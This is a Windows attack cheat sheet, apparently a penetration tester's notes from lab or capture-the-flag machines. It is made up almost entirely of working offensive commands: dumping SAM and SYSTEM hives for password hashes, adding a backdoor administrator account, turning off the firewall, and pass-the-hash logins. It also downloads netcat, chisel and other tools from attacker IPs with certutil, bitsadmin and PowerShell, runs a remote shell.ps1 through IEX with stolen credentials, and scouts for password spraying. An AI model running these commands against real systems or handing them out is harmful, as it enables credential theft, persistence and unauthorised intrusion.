reg save hklm\sam .\sam
reg save hklm\system .\system
reg save hklm\security .\security
secretsdump.py -sam sam -system system -security security LOCAL > hashes.txt
net user hacker hacker123 /add
net localgroup Administrators hacker /add
net localgroup "Remote Desktop Users" hacker /ADD
NetSh Advfirewall set allprofiles state off
pth-winexe -U JEEVES/administrator%aad3b43XXXXXXXX35b51404ee:e0fb1fb857XXXXXXXX238cb
e81fe00 //10.129.26.210 cmd.exe
C:\W indows\S ystem32\c md.exe /c ping 10.10.14.27
# on linux box:
tcpdump -i tun0 icmp
Ping test blind rce like above check if x64 powershell exists
C:\W indows\S ysNative\W indowsPowerShell\v 1.0\p owershell.exe ping 10.10.14.27
certutil.exe -urlcache -split -f http://10.10.14.10:8000/nc64.exe C:\\ Users\\ Public\\ nc64.exe
powershell -c " (new-object System.Net.WebClient).DownloadFile('http:/
/10.11.0.4/wget.exe','C:\Users\admin\Desktop\wget.exe')"
powershell iwr -uri http://10.10.16.97:8000/chisel.exe -outfile ch.exe # also works in PS ConstrainLanguageMode
expand http://10.10.14.10:8000/watson.exe C:\\ Users\\ Public\\ watson.exe
bitsadmin /transfer debjob /download /priority normal http://10.10.14.10:8000/watson.exe C:\U sers\\ Public\w atson.exe
certutil.exe -hashfile Taihou64.exe MD5
dir /R file.txt - to check
expand hm.txt:root.txt root.txt
powershell -command " Get-Content C:\ADS\1.txt -Stream file.exe -Raw"
List directory permissions (win server 2003)
List alternate data stream files
Mount windows account share using cifs, "ACCT here is account share name"
sudo mount -t cifs -o username=Finance //10.1.1.1/ACCT /mnt/win_share/
Mount vhd file from share
sudo guestmount --add 9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd --inspector -ro -v /path/to/mount/directory
Executing privileged command using valid credentials from powershell
$username = " Username\Administrator"
$password = " SUPERSECRETPASS"
$secstr = New-Object -TypeName System.Security.SecureString
$password.ToCharArray () | ForEach-Object {$secstr .AppendChar($_ )}
$cred = new-object -typename System.Management.Automation.PSCredential -argumentlist $username , $secstr
Invoke-Command -ScriptBlock { IEX(New-Object Net.WebClient).downloadString(' http://10.10.14.10:8000/shell.ps1' ) } -Credential $cred -Computer localhost
or - [BETTER]
$username = " Username\Administrator"
$password = ConvertTo-SecureString -AsPlainText -Force ' SUPERSECRETPASS'
$cred = New-Object -typename System.Management.Automation.PSCredential -argumentlist $username , $password
Start-Process -FilePath " powershell" -argumentlist " IEX(New-Object Net.WebClient).downloadString('http://10.10.16.97:8000/shell.ps1')" -Credential $cred
Logging into the privileged user account using valid credentials from powershell
$username = ' Username\Administrator'
$securePassword = ConvertTo-SecureString -AsPlainText -Force ' SUPERSECRETPASS'
$credential = New-Object System.Management.Automation.PSCredential $username , $securePassword
Enter-PSSession -ComputerName localhost -Credential $credential
Dump password policy to prepare wordlist for password spray if smb null authentication allows domain enumeration.
crackmapexec smb 10.10.10.161 --pass-pol -u ' ' -p ' '
Check account lock policy before password spraying smb
crackmapexec smb 10.10.10.123 --pass-pol